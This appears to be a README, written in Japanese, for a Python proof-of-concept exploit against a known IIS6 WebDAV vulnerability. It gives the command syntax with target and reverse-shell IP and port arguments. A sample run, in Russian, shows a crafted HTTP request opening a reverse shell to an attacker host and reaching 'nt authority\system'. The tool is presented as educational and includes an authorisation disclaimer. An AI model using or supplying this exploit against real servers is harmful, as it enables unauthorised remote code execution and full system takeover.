
は、IIS6のWebDAVコンポーネントにおける既知の脆弱性のエクスプロイトを実証するPoCツールです。
GenWebDavIISExploit は、IIS6 の WebDAV コンポーネントにおける既知の脆弱性を悪用するための PoC ツールです。このツールは教育および研究目的で設計されており、脆弱性を利用してリモートサーバー上で任意のコードを実行する方法を示します。
このプロジェクトは教育目的のみを意図しています。このツールは責任を持って、自分が所有するシステム、またはテストの明示的な許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法です。
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1